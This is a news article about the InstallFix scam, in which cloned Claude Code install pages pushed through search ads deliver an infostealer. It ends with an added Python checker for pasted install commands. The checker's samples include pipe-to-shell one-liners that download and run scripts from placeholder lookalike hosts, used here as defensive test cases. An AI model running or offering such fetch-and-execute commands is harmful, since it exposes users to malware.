This Scam Imitates the Official Claude Code Website to Distribute Malware.

If you use an AI-powered programming assistant like Claude Code, here’s a good reason to always make sure you’re copying commands from a legitimate interface: scammers are now using cloned versions of popular tools to distribute information-stealing malware via fake installation instructions—a tactic known as InstallFix.
Fake Claude Code interface used for InstallFix attacks.
Researchers at Push Security discovered carefully copied versions of the Claude Code website, the site for Anthropic’s AI-powered programming assistant, that look exactly like the original, including the layout, branding, text, documentation sidebar, and a similar domain. Every link on the page even redirects to the legitimate Claude Code website. The only malicious part is the single-line command for installing Claude Code, offered for macOS, Windows PowerShell, and Windows CMD. If you copy and paste this into the terminal, the malware will run instead of Claude Code.
InstallFix is a variation of ClickFix, a social engineering tactic that uses fake error messages, CAPTCHAs, and command lines to trick users into installing malware on their devices. A similar campaign recently used fake OpenClaw installers.
The current Claude Code scheme targets both Windows and Mac users with the information-stealing malware Amatera. This malware can collect browser data—saved passwords, cookies, session tokens, autofill data, even cryptocurrency wallets and credentials—as well as system information. Attackers can further evade detection by hosting malicious websites on legitimate platforms like Cloudflare Pages and Squarespace.
How to Avoid InstallFix Attacks
Push Security discovered that these fake installation pages were distributed through malicious advertising—specifically, through sponsored Google results when users searched for terms like “Claude Code,” “Claude Code install,” or “Claude Code CLI.” Be especially careful when searching for programming tools or installation instructions, and do not run commands copied from emails, forums, social media posts, or websites unless you have verified their authenticity yourself.
Google’s search results allow you to hide ads (after you’ve scrolled past them), which is a good practice to avoid accidentally clicking on malicious ads. It’s also recommended to bookmark trusted sources you know you’ll need to return to, so you don’t have to search for them again each time.
Finally, carefully check both URLs and commands. Attackers use tricks to make fake web addresses appear legitimate at first glance, but upon closer inspection, you’ll see that you’re not on Claude Code’s real site. You can also enter commands manually (again, only from trusted sources) to ensure you’re not copying or executing anything hidden in the text.
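The URL-and-command check described above can be done mechanically before a pasted one-liner reaches the terminal. The following is an added example, not code from the original article or from Push Security; the function name `review_command`, the `TRUSTED_HOSTS` allowlist and every `.example` domain are placeholders you would replace with hosts you have verified yourself.

```python
import re
import unicodedata
from urllib.parse import urlsplit

# Assumption: hosts you have verified yourself. Placeholder value, not a real vendor domain.
TRUSTED_HOSTS = {"downloads.vendor.example"}

URL_RE = re.compile(r"https?://[^\s'\"|;)<>]+", re.IGNORECASE)


def review_command(command, trusted_hosts=TRUSTED_HOSTS):
    """Return findings for a pasted install one-liner; an empty list means nothing was flagged."""
    findings = []

    # Format characters (zero-width, bidi overrides) and control characters
    # (including a newline that would run the line on paste) are invisible on a web page.
    for ch in sorted(set(command)):
        if unicodedata.category(ch) in ("Cf", "Cc"):
            findings.append(f"hidden character U+{ord(ch):04X}")

    for url in URL_RE.findall(command):
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()
        if parts.scheme != "https":
            findings.append(f"non-HTTPS download: {host}")
        if parts.username is not None:
            # In https://trusted@other/ the client connects to "other"; the text before @ is decoration.
            findings.append(f"userinfo in URL hides real host: {host}")
        if host.startswith("xn--") or ".xn--" in host or not host.isascii():
            findings.append(f"internationalized host, check for lookalike letters: {host}")
        if host not in trusted_hosts:
            findings.append(f"untrusted host: {host}")
    return findings


if __name__ == "__main__":
    # Constructed samples; every domain here is a placeholder.
    samples = [
        "curl -fsSL https://downloads.vendor.example/install.sh | bash",
        "curl -fsSL https://downloads-vendor.example/install.sh | bash",
        "irm https://downloads.vendor.example@files.other.example/i.ps1 | iex",
        "curl -fsSL https://downloads.vendor.example/install.sh\u200b | bash",
    ]
    for sample in samples:
        print(repr(sample), "->", review_command(sample) or "nothing flagged")
```

An exact-match allowlist is deliberate: a lookalike domain that differs by one character or one hyphen fails the check, which is the case a visual inspection tends to miss.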